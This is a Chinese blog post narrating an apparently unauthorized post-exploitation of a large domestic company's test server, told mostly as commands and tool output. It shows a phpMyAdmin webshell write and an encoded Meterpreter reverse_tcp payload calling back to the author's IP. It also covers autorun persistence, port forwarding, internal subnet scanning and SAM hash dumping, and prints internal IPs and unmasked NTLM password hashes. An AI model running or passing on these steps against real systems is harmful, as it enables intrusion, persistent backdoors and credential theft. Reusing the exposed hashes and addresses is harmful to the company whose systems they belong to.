倾旋的博客

倾旋的博客

现阶段在进行有效性验证/攻击模拟相关的安全研究工作,我的博客会记录一些我的学习过程和部分安全技术研究成果。

28 Dec 2017

针对国内一大厂的后渗透 - 持续

0x00 前言

此文将全部脱敏,涉及某大厂商,中间会穿插一些小的知识点与细节。

0x01 信息搜集 - 后渗透

首先我们后渗透阶段的开始表现在 拥有一个Webshell或者通过其他漏洞获取了某些操作服务器文件的权限,亦或者能够直接反弹Shell

这里我挑选了一个某厂边缘处的一个测试环境,在这之前我做了大量的信息搜集,没有选择直接去挖掘、利用漏洞

  • 操作系统
  • Web服务器版本
  • PHP版本
  • 绝对路径
  • 子域名
  • 开放端口 - 发现开启了防火墙

扫描到它存在phpMyadmin,弱口令登录进入,通过常规手法SQL写入shell。

1
SELECT '<?php @assert($_POST["qyxmsq56dhaye3"]);?>' INTO OUTFILE 'D:/WWW/***/master/';

通过Webshell的方式进入,肯定是要直接看权限了,但是由于是他们的测试环境,权限相对比较高。

1
2
3
4
5
6
D:\WWW\***\master\> net user /domain
这项请求将在域 WORKGROUP 的域控制器处理。

发生系统错误 1355。

指定的域不存在,或无法联系。

通过上面的结果可以看到该服务器并不是域成员

1
2
D:\WWW\***\master\> query user
* 没有用户

没有管理员在线

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

D:\WWW\***\master\> netstat -ano

活动连接

  协议  本地地址          外部地址        状态           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1692
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1584
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       12
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1740
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       3740
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       828
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       1052
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       1108
  TCP    0.0.0.0:49160          0.0.0.0:0              LISTENING       932
  TCP    0.0.0.0:49161          0.0.0.0:0              LISTENING       924
  TCP    10.***.63.178:139      0.0.0.0:0              LISTENING       4
  TCP    10.***.191.178:139     0.0.0.0:0              LISTENING       4
  TCP    10.***.191.178:58359   *.*.*.*:****     ESTABLISHED     5576
  TCP    10.***.191.178:58362   *.*.*.*:****     ESTABLISHED     4700
  TCP    *.*.*.*:****     *.*.*.*:****    TIME_WAIT       0
  TCP    *.*.*.*:****     *.*.*.*:****    ESTABLISHED     1584
  TCP    169.254.112.31:139     0.0.0.0:0              LISTENING       4
  TCP    169.254.191.36:139     0.0.0.0:0              LISTENING       4
  TCP    [::]:21                [::]:0                 LISTENING       1692
  TCP    [::]:80                [::]:0                 LISTENING       1584
  TCP    [::]:135               [::]:0                 LISTENING       12
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:3389              [::]:0                 LISTENING       3740
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       828
  TCP    [::]:49153             [::]:0                 LISTENING       1052
  TCP    [::]:49154             [::]:0                 LISTENING       1108
  TCP    [::]:49160             [::]:0                 LISTENING       932
  TCP    [::]:49161             [::]:0                 LISTENING       924
  UDP    0.0.0.0:500            *:*                                    1108
  UDP    0.0.0.0:4500           *:*                                    1108
  UDP    0.0.0.0:5355           *:*                                    1248
  UDP    10.***.63.178:137      *:*                                    4
  UDP    10.***.63.178:138      *:*                                    4
  UDP    10.***.191.178:137     *:*                                    4
  UDP    10.***.191.178:138     *:*                                    4
  UDP    169.254.112.31:137     *:*                                    4
  UDP    169.254.112.31:138     *:*                                    4
  UDP    169.254.191.36:137     *:*                                    4
  UDP    169.254.191.36:138     *:*                                    4
  UDP    [::]:500               *:*                                    1108
  UDP    [::]:4500              *:*                                    1108
  UDP    [::]:5355              *:*                                    1248

可以发现有3389端口,我尝试了去直接连接,但是被拒绝了,绝对是防火墙做了入站限制

这个尝试是有风险的,因为你不知道下一步的操作能够为自己带来怎样的走向

再查看一下网卡:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
D:\WWW\****\master\> ipconfig

Windows IP 配置


以太网适配器 本地连接 4:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::35ec:****:321d%17
   IPv4 地址 . . . . . . . . . . . . : 10.159.191.178
   子网掩码  . . . . . . . . . . . . : 255.255.255.128
   IPv4 地址 . . . . . . . . . . . . : ****
   子网掩码  . . . . . . . . . . . . : 255.255.255.255
   默认网关. . . . . . . . . . . . . : 10.159.191.254

以太网适配器 本地连接 3:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::****:701f%15
   自动配置 IPv4 地址  . . . . . . . : 169.254.112.31
   子网掩码  . . . . . . . . . . . . : 255.255.0.0
   默认网关. . . . . . . . . . . . . : 

以太网适配器 本地连接 2:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::****:7c4d:bf24%13
   自动配置 IPv4 地址  . . . . . . . : 169.254.191.36
   子网掩码  . . . . . . . . . . . . : 255.255.0.0
   默认网关. . . . . . . . . . . . . : 

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::****:b5e7:5894%11
   IPv4 地址 . . . . . . . . . . . . : 10.159.63.178
   子网掩码  . . . . . . . . . . . . : 255.255.255.128
   默认网关. . . . . . . . . . . . . : 

隧道适配器 isatap.{228D34A2-****-B05B-2891059A32DF}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 

隧道适配器 isatap.{9F839E1D-****-82F7-592092A89872}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 

隧道适配器 isatap.{C900083B-5E7E-****-8BC25B24D7C1}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 

隧道适配器 isatap.{0E2DB1B0-50C3-****-4F5513DCBD08}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 

隧道适配器 6TO4 Adapter:

   连接特定的 DNS 后缀 . . . . . . . : 
   IPv6 地址 . . . . . . . . . . . . : ***
   默认网关. . . . . . . . . . . . . : 
 

这个内网地址我就不脱敏了,方便读者阅读后面的操作

0x02 后渗透的开始

0x01

网络拓扑图如上

首先我要生成一个MSF木马,目标由于是Win 2008支持Powershell,可以直接一句话搞定 :)

./ps1encode.rb -i 外网IP -p 1131 -a windows/x64/meterpreter/reverse_tcp

这里我是进行了一个端口转发,将公司路由的1131映射到本机的1131

MSF这边监听1131:

1
2
3
4
5
6
Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://0.0.0.0:1131

ps1encode 项目 :https://github.com/CroweCybersecurity/ps1encode

1
2
powershell -nop -win Hidden -noni -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQ
..........

但是期望越大失望越大,目标主机提示语法错误,难道是webshell传输字符串太长有丢失?

我尝试了使用cmd批处理脚本启动,vbs脚本启动,一样无果。

决定不采用powershell了,采用exe

1
./ps1encode.rb -i [我的公网IP] -p 1131 -a windows/x64/meterpreter/reverse_tcp -t exe

执行过程中有时候会出现这类情况:

1
2
3
4
msf exploit(handler) > 
[*] Sending stage (179267 bytes) to *.*.*.*
[*] Meterpreter session 1 opened (192.168.3.13:1131 -> *.*.*.*:54103) at 2017-12-27 13:54:58 +0800
[*] *.*.*.* - Meterpreter session 9 closed.  Reason: Died

很明显是生成的木马与操作系统不兼容;

更改为:

1
./ps1encode.rb -i *.*.*.* -p 1131 -a windows/x64/meterpreter/reverse_tcp --32bitexe -t exe

使用WebShell执行后:

1
2
3
msf exploit(handler) > 
[*] Sending stage (179267 bytes) to *.*.*.*
[*] Meterpreter session 6 opened (192.168.3.13:1131 -> *.*.*.*:54085) at 2017-12-27 13:51:41 +0800

权限维持

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > run persistence -X -i 50 -p 1132 -r [我的公网IP] 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /Users/liyingzhe/.msf4/logs/persistence/ZXKF3_20171227.1214/ZXKF3_20171227.1214.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=*.*.*.* LPORT=1132
[*] Persistent agent script is 99700 bytes long
[+] Persistent Script written to C:\Users\ALLEN~1.ZXK\AppData\Local\Temp\iyWfiOpMC.vbs
[*] Executing script C:\Users\ALLEN~1.ZXK\AppData\Local\Temp\iyWfiOpMC.vbs
[+] Agent executed with PID 5204
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\CRHiMoLoChdTP
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\CRHiMoLoChdTP

0x03 关于权限维持的思考

persistence 模块

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
meterpreter > info post/windows/manage/persistence_exe

       Name: Windows Manage Persistent EXE Payload Installer
     Module: post/windows/manage/persistence_exe
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Merlyn drforbin Cousins <drforbin6@gmail.com>

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  REXENAME  default.exe      yes       The name to call exe on remote system
  REXEPATH                   yes       The remote executable to use.
  SESSION                    yes       The session to run this module on.
  STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

Description:
  This Module will upload an executable to a remote host and make it 
  Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER 
  will start on user login, SYSTEM will start on system boot but 
  requires privs. SERVICE will create a new service which will start 
  the payload. Again requires privs.



Module options (post/windows/manage/persistence_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   REXENAME  default.exe      yes       The name to call exe on remote system
   REXEPATH                   yes       The remote executable to use.
   SESSION                    yes       The session to run this module on.
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

优先介绍这个模块 post/windows/manage/persistence_exe

它用于创建一个反向连接的后门,使被控端主动连接控制端,传统又好用,但是会留下文件

参数介绍:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        自启动一个匹配的handler会话来连接
    -L <opt>  连接目标
    -P <opt>  指定payload ,默认是 windows/meterpreter/reverse_tcp.
    -S        在启动时作为服务自动启动代理(具有SYSTEM权限
    -T <opt>  使用模板
    -U        用户登录时自动启动代理
    -X        系统引导时自动启动代理
    -h        帮助菜单
    -i <opt>  间隔多少秒像控制端发送连接
    -p <opt>  被控端要连接的端口
    -r <opt>  被控端要连接的IP地址

metsvc

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
meterpreter > run metsvc -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]

OPTIONS:

    -A        自动启动一个匹配 exploit/multi/handler来连接服务
    -h        帮助菜单
    -r        卸载服务

它是一个正向的连接,不适用于复杂的内网环境

0x04 端口转发之portfwd详解

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
meterpreter > ifconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Broadcom NetXtreme Gigabit Ethernet
Hardware MAC : c8:1f:66:f2:a9:6b
MTU          : 1500
IPv4 Address : 10.159.63.178
IPv4 Netmask : 255.255.255.128
IPv6 Address : fe80::4d1c:361b:b5e7:5894
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a9f:3fb2
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 13
============
Name         : Broadcom NetXtreme Gigabit Ethernet #2
Hardware MAC : c8:1f:66:f2:a9:6c
MTU          : 1500
IPv4 Address : 169.254.191.36
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::b805:65eb:7c4d:bf24
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 14
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a9fe:bf24
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 15
============
Name         : Broadcom NetXtreme Gigabit Ethernet #3
Hardware MAC : c8:1f:66:f2:a9:6d
MTU          : 1500
IPv4 Address : 169.254.112.31
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::1d1d:79:e7f1:701f
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 16
============
Name         : Microsoft ISATAP Adapter #3
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a9fe:701f
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 17
============
Name         : Broadcom NetXtreme Gigabit Ethernet #4
Hardware MAC : c8:1f:66:f2:a9:6e
MTU          : 1500
IPv4 Address : 10.159.191.178
IPv4 Netmask : 255.255.255.128
IPv4 Address : ***.***.***.***
IPv4 Netmask : 255.255.255.255
IPv6 Address : fe80::35ec:8852:7f1f:321d
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 18
============
Name         : Microsoft ISATAP Adapter #4
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a9f:bfb2
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
IPv6 Address : fe80::200:5efe:7b67:7168
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 21
============
Name         : Microsoft 6to4 Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : 2002:7b67:7168::7b67:7168
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
meterpreter > netstat -anpt

Connection list
===============

    Proto  Local address                  Remote address       State        User  Inode  PID/Program name
    -----  -------------                  --------------       -----        ----  -----  ----------------
    tcp    169.254.191.36:139             0.0.0.0:*            LISTEN       0     0      4/System
    tcp    0.0.0.0:135                    0.0.0.0:*            LISTEN       0     0      12/svchost.exe
    tcp    0.0.0.0:445                    0.0.0.0:*            LISTEN       0     0      4/System
    tcp    0.0.0.0:3306                   0.0.0.0:*            LISTEN       0     0      1740/mysqld.exe
    tcp    0.0.0.0:3389                   0.0.0.0:*            LISTEN       0     0      3740/svchost.exe
    tcp    0.0.0.0:47001                  0.0.0.0:*            LISTEN       0     0      4/System
    tcp    0.0.0.0:49152                  0.0.0.0:*            LISTEN       0     0      828/wininit.exe
    tcp    0.0.0.0:49153                  0.0.0.0:*            LISTEN       0     0      1052/svchost.exe
    tcp    0.0.0.0:49154                  0.0.0.0:*            LISTEN       0     0      1108/svchost.exe
    tcp    0.0.0.0:21                     0.0.0.0:*            LISTEN       0     0      1692/svchost.exe
    tcp    0.0.0.0:49160                  0.0.0.0:*            LISTEN       0     0      932/lsass.exe
    tcp    0.0.0.0:49161                  0.0.0.0:*            LISTEN       0     0      924/services.exe
    tcp    10.159.63.178:139              0.0.0.0:*            LISTEN       0     0      4/System
    tcp    10.159.191.178:139             0.0.0.0:*            LISTEN       0     0      4/System
    tcp    10.159.191.178:58359           *.*.*.*:1131   ESTABLISHED  0     0      5576/1.exe
    tcp    10.159.191.178:58362           *.*.*.*:1131   ESTABLISHED  0     0      4700/1.exe
    tcp    10.159.191.178:58590           *.*.*.*:4961  SYN_SENT     0     0      2472/Ijkptue.exe
    tcp    169.254.112.31:139             0.0.0.0:*            LISTEN       0     0      4/System
    tcp    0.0.0.0:80                     0.0.0.0:*            LISTEN       0     0      1584/httpd.exe
    tcp6   :::49160                       :::*                 LISTEN       0     0      932/lsass.exe
    tcp6   :::21                          :::*                 LISTEN       0     0      1692/svchost.exe
    tcp6   :::80                          :::*                 LISTEN       0     0      1584/httpd.exe
    tcp6   :::135                         :::*                 LISTEN       0     0      12/svchost.exe
    tcp6   :::445                         :::*                 LISTEN       0     0      4/System
    tcp6   :::3389                        :::*                 LISTEN       0     0      3740/svchost.exe
    tcp6   :::47001                       :::*                 LISTEN       0     0      4/System
    tcp6   :::49152                       :::*                 LISTEN       0     0      828/wininit.exe
    tcp6   :::49153                       :::*                 LISTEN       0     0      1052/svchost.exe
    tcp6   :::49154                       :::*                 LISTEN       0     0      1108/svchost.exe
    tcp6   :::49161                       :::*                 LISTEN       0     0      924/services.exe
    udp    0.0.0.0:500                    0.0.0.0:*                         0     0      1108/svchost.exe
    udp    0.0.0.0:4500                   0.0.0.0:*                         0     0      1108/svchost.exe
    udp    0.0.0.0:5355                   0.0.0.0:*                         0     0      1248/svchost.exe
    udp    10.159.63.178:137              0.0.0.0:*                         0     0      4/System
    udp    10.159.63.178:138              0.0.0.0:*                         0     0      4/System
    udp    10.159.191.178:137             0.0.0.0:*                         0     0      4/System
    udp    10.159.191.178:138             0.0.0.0:*                         0     0      4/System
    udp    169.254.112.31:137             0.0.0.0:*                         0     0      4/System
    udp    169.254.112.31:138             0.0.0.0:*                         0     0      4/System
    udp    169.254.191.36:137             0.0.0.0:*                         0     0      4/System
    udp    169.254.191.36:138             0.0.0.0:*                         0     0      4/System
    udp6   :::500                         :::*                              0     0      1108/svchost.exe
    udp6   :::4500                        :::*                              0     0      1108/svchost.exe
    udp6   :::5355                        :::*                              0     0      1248/svchost.exe
    udp6   fe80::1d1d:79:e7f1:701f:546    :::*                              0     0      1052/svchost.exe
    udp6   fe80::35ec:8852:7f1f:321d:546  :::*                              0     0      1052/svchost.exe
    udp6   fe80::4d1c:361b:b5e7:5894:546  :::*                              0     0      1052/svchost.exe

可以看出服务器开启了3389,假设我如果需要连接3389该怎么办呢? - (刚才提到了,有防火墙的限制)

使用portfwd

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  转发: 本地监听地址  反向: 本地主机连接到某个地址
    -R        表示正向反向端口
    -h        帮助信息
    -i <opt>  端口转发条目的索引与交互(请参阅“列表”命令)
    -l <opt>  转发:本地端口收听  反向:本地端口连接
    -p <opt>  转发:远程端口连接  反向:远程端口监听
    -r <opt>  转发:连接到远程主机

下面来练习一下(正向转发)

目的:将内网某台主机的3389转发到本地

1
portfwd add -L 0.0.0.0 -l 1144 -p 3389 -r 10.159.63.178

此时连接本机的1144就相当于连接10.159.63.178

目的:将内网某台主机端口流量转发到某台外网主机 (可做端口劫持)

1
portfwd add -R -l 8080 -p 1478 -L 10.159.191.2

此时访问10.159.63.178的1478端口就相当于访问10.159.191.2的8080端口

1
portfwd delete -i 1

删除条目为1的端口转发

1
portfwd list

列出端口转发条目

1
portfwd flush

清空所有转发

端口扫描

添加路由表:

1
2
3
4
meterpreter > run autoroute -s 10.159.0.0 255.255.128.0
meterpreter > run autoroute -s 10.159.128.0 255.255.128.0
meterpreter > run autoroute -s 10.159.63.0 255.255.255.128
meterpreter > run autoroute -s 10.159.191.0 255.255.255.128

当然在上线前,你就设置好自动添加路由,就不需要去手动添加了:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
msf auxiliary(tcp) > load auto_add_route
msf auxiliary(tcp) > 
[*] Sending stage (179267 bytes) to ***.***.***.***
[*] Meterpreter session 9 opened (192.168.3.14:1131 -> ***.***.***.***:60372) at 2018-01-02 15:22:20 +0800
[*] AutoAddRoute: Routing new subnet 10.0.0.0/255.0.0.0 through session 9
[*] AutoAddRoute: Routing new subnet 10.159.0.0/255.255.128.0 through session 9
[*] AutoAddRoute: Routing new subnet 10.159.63.128/255.255.255.128 through session 9
[*] AutoAddRoute: Routing new subnet 10.159.128.0/255.255.128.0 through session 9
[*] AutoAddRoute: Routing new subnet 10.159.191.128/255.255.255.128 through session 9
[*] AutoAddRoute: Routing new subnet 169.254.0.0/255.255.0.0 through session 9
[*] AutoAddRoute: Routing new subnet 192.168.0.0/255.255.0.0 through session 9
[-] The 'stdapi' extension has already been loaded.
msf auxiliary(tcp) > sessions -i 9 
[*] Starting interaction with 9...

meterpreter > 

但是它也有弊端,就是子网太大了,可能会将我们的数据包广播出去,所以最好记一下子网大小,手动灵活添加路由~

扫描

1
2
3
4
5
6
msf exploit(handler) > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > set PORTS 22-25,80-85,1433,3306,3389,445,135,139
PORTS => 22-25,80-85,1433,3306,3389,445,135,139
msf auxiliary(syn) > set RHOSTS 10.159.191.1-254
RHOSTS => 10.159.191.1-254
msf auxiliary(syn) > run
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
msf > use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > show options 

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > set PORTS 22-25,80-85,1433,3306,3389,445,135,139
PORTS => 22-25,80-85,1433,3306,3389,445,135,139
msf auxiliary(tcp) > set RHOSTS 10.159.191.1-254
RHOSTS => 10.159.191.1-254
msf auxiliary(tcp) > set THREADS 3
THREADS => 3
msf auxiliary(tcp) > run
[+] 10.159.191.1:         - 10.159.191.1:22 - TCP OPEN
[+] 10.159.191.2:         - 10.159.191.2:8080 - TCP OPEN
[+] 10.159.191.5:         - 10.159.191.5:22 - TCP OPEN
[+] 10.159.191.5:         - 10.159.191.5:8080 - TCP OPEN
[+] 10.159.191.7:         - 10.159.191.7:22 - TCP OPEN
[+] 10.159.191.8:         - 10.159.191.8:22 - TCP OPEN
[+] 10.159.191.7:         - 10.159.191.7:8080 - TCP OPEN
[+] 10.159.191.8:         - 10.159.191.8:8080 - TCP OPEN
[+] 10.159.191.6:         - 10.159.191.6:8080 - TCP OPEN
[+] 10.159.191.10:        - 10.159.191.10:22 - TCP OPEN
[+] 10.159.191.11:        - 10.159.191.11:22 - TCP OPEN
[+] 10.159.191.9:         - 10.159.191.9:22 - TCP OPEN
[+] 10.159.191.11:        - 10.159.191.11:8080 - TCP OPEN
[+] 10.159.191.9:         - 10.159.191.9:8080 - TCP OPEN
[+] 10.159.191.10:        - 10.159.191.10:8080 - TCP OPEN
[+] 10.159.191.12:        - 10.159.191.12:22 - TCP OPEN
[+] 10.159.191.12:        - 10.159.191.12:8080 - TCP OPEN
[+] 10.159.191.15:        - 10.159.191.15:22 - TCP OPEN
[+] 10.159.191.15:        - 10.159.191.15:8080 - TCP OPEN
[+] 10.159.191.13:        - 10.159.191.13:8080 - TCP OPEN
[+] 10.159.191.18:        - 10.159.191.18:8080 - TCP OPEN
[+] 10.159.191.17:        - 10.159.191.17:8080 - TCP OPEN
[+] 10.159.191.19:        - 10.159.191.19:22 - TCP OPEN
[+] 10.159.191.19:        - 10.159.191.19:8080 - TCP OPEN
[+] 10.159.191.26:        - 10.159.191.26:22 - TCP OPEN
[+] 10.159.191.26:        - 10.159.191.26:3306 - TCP OPEN
[*] Scanned  26 of 254 hosts (10% complete)
[+] 10.159.191.35:        - 10.159.191.35:22 - TCP OPEN
[+] 10.159.191.36:        - 10.159.191.36:22 - TCP OPEN
[+] 10.159.191.39:        - 10.159.191.39:22 - TCP OPEN
[+] 10.159.191.39:        - 10.159.191.39:3306 - TCP OPEN
[+] 10.159.191.50:        - 10.159.191.50:22 - TCP OPEN
[+] 10.159.191.51:        - 10.159.191.51:22 - TCP OPEN
[+] 10.159.191.50:        - 10.159.191.50:3306 - TCP OPEN
******

0x05 Meterpreter

获取Hash的几个方式

run hashdump

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
meterpreter > run hashdump 

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 699b2df6ee97132bcad5b2f9efdc738e...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:268: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:272: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:279: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b4***b51404ee:a4b09576473b6a35e456ed407a98e334:::
Guest:501:aad3b435b5140***404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ftpuser:1000:aad3b435b51****ee:2280c4ddb554cdcdc62c72c291f2810a:::
patrol:1002:aad3b435b51****78ab2d769fda7de045a3622a62ea:::
neuadmin:1005:aad3b435***404ee:345b3b0faf52aea5200da1cf8d1323a0:::

run powerdump

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
meterpreter > run powerdump 
[*] PowerDump v0.1 - PowerDump to extract Username and Password Hashes...
[*] Running PowerDump to extract Username and Password Hashes...
[*] Uploaded PowerDump as 53805.ps1 to %TEMP%...
[*] Setting ExecutionPolicy to Unrestricted...
[*] Dumping the SAM database through PowerShell...
??Administrator:500:aad3b435b51404eeaad3b435b51404ee:a4b09576473b6a35e456ed407a98e334:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ftpuser:1000:aad3b435b51404eeaad3b435b51404ee:2280c4ddb554cdcdc62c72c291f2810a:::
patrol:1002:aad3b435b51404eeaad3b435b51404ee:ce7878ab2d769fda7de045a3622a62ea:::
